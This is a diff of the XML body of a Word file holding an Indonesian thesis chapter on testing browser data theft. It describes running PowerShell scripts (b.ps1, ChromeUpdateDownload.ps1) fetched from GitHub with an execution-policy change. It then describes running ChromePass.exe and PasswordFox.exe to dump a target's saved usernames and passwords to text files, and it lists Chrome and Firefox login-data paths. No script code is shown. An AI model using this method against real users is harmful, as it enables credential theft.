+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.  Perintah Menjalankan </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -36859,58 +36589,51 @@
           <w:iCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>File</w:t>
+        <w:t>Script</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dari Github</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="149"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:ind w:hanging="11"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="150" w:name="_Toc43426567"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Pengujian Pengambilan Data </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dengan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Browser</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="150"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+          <w:noProof/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Execution Policy</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="148"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -36920,7 +36643,14 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">Pada pengujian tahap ini, penulis akan menjalankan program ChromePass.exe dan PasswordFox.exe untuk mengambil data </w:t>
+        <w:tab/>
+        <w:t xml:space="preserve">Gambar V-8 berikut menampilkan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">seluruh </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -36928,13 +36658,25 @@
           <w:iCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>username</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dan </w:t>
+        <w:t xml:space="preserve">file </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>unduhan dari Github</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> penulis</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dengan menjalankan </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -36942,91 +36684,25 @@
           <w:iCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> pada </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">browser </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">target. Selain menjalankan kedua program tersebut, pada saat yang sama </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>file</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> berformat .txt dibuat untuk menimpan data yang telah diambil dari </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>browser</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> target menggunakan perintah </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>/stext</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Gambar V-9 menampilkan perintah untuk menjalankan program dan menyimpannya dalam </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>file</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> .txt. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> b.ps1 dan ChromeUpdateDownload.ps1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -37035,22 +36711,21 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
         <w:keepNext/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AB7084C" wp14:editId="2577A856">
-            <wp:extent cx="4579315" cy="1922182"/>
-            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
-            <wp:docPr id="61" name="Picture 61"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6240F9C9" wp14:editId="5CB7B6BB">
+            <wp:extent cx="4563553" cy="2918765"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
+            <wp:docPr id="60" name="Picture 60"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -37070,7 +36745,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4620205" cy="1939346"/>
+                      <a:ext cx="4608778" cy="2947690"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -37086,14 +36761,15 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Caption"/>
-        <w:ind w:left="2410"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1440" w:firstLine="545"/>
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="151" w:name="_Toc43425330"/>
+      <w:bookmarkStart w:id="149" w:name="_Toc43425329"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -37128,7 +36804,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>9</w:t>
+        <w:t>8</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -37143,236 +36819,213 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>. Perintah Menjalankan Program</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="151"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Caption"/>
+        <w:t>. Berhasil Mengunduh</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> seluruh</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>File</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dari Github</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="149"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:ind w:hanging="11"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="150" w:name="_Toc43427734"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pengujian Pengambilan Data </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Browser</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="150"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pada pengujian tahap ini, penulis akan menjalankan program ChromePass.exe dan PasswordFox.exe untuk mengambil data </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">browser </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">target. Selain menjalankan kedua program tersebut, pada saat yang sama </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> berformat .txt dibuat untuk menimpan data yang telah diambil dari </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>browser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target menggunakan perintah </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>/stext</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Gambar V-9 menampilkan perintah untuk menjalankan program dan menyimpannya dalam </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> .txt. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Baik ChromePass.exe maupun PasswordFox.exe </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dapat mengambil data password berdasarkan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>login data</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">masing-masing </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>browser</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> yang tersimpan pada penyimpanan lokal komputer. Google Chrome menyimpan login data yang disimpan pengguna pada direktori berikut: </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>C:\Users\HP-PC\AppData\Local\Google\Chrome\User Data\Default</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Adapun Mozilla Firefox menyimpan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>login data</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> pengguna pada direktori:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>C:\Users\HP-PC\AppData\Roaming\Mozilla\Firefox\Profiles</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Gambar V-11 dan V-12 berikut ini menampilkan isi dari </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">login data </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">kedua </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>browser</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> tersebut.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
         <w:keepNext/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
@@ -37380,10 +37033,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F730CF2" wp14:editId="7B1C5D44">
-            <wp:extent cx="4615891" cy="2966777"/>
-            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
-            <wp:docPr id="63" name="Picture 63"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AB7084C" wp14:editId="2577A856">
+            <wp:extent cx="4579315" cy="1922182"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="61" name="Picture 61"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -37403,7 +37056,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4630389" cy="2976095"/>
+                      <a:ext cx="4620205" cy="1939346"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -37423,9 +37076,10 @@
         <w:rPr>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="152" w:name="_Toc43425331"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="151" w:name="_Toc43425330"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -37460,7 +37114,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>10</w:t>
+        <w:t>9</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -37475,32 +37129,229 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+        <w:t>. Perintah Menjalankan Program</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="151"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Baik ChromePass.exe maupun PasswordFox.exe </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dapat mengambil data password berdasarkan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t>Login Data</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> pada Google Chrome</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="152"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>login data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">masing-masing </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>browser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> yang tersimpan pada penyimpanan lokal komputer. Google Chrome menyimpan login data yang disimpan pengguna pada direktori berikut: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>C:\Users\HP-PC\AppData\Local\Google\Chrome\User Data\Default</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Adapun Mozilla Firefox menyimpan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>login data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pengguna pada direktori:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>C:\Users\HP-PC\AppData\Roaming\Mozilla\Firefox\Profiles</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V-11 dan V-12 berikut ini menampilkan isi dari </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">login data </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kedua </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>browser</w:t>
+      </w:r>
+      <w:r>
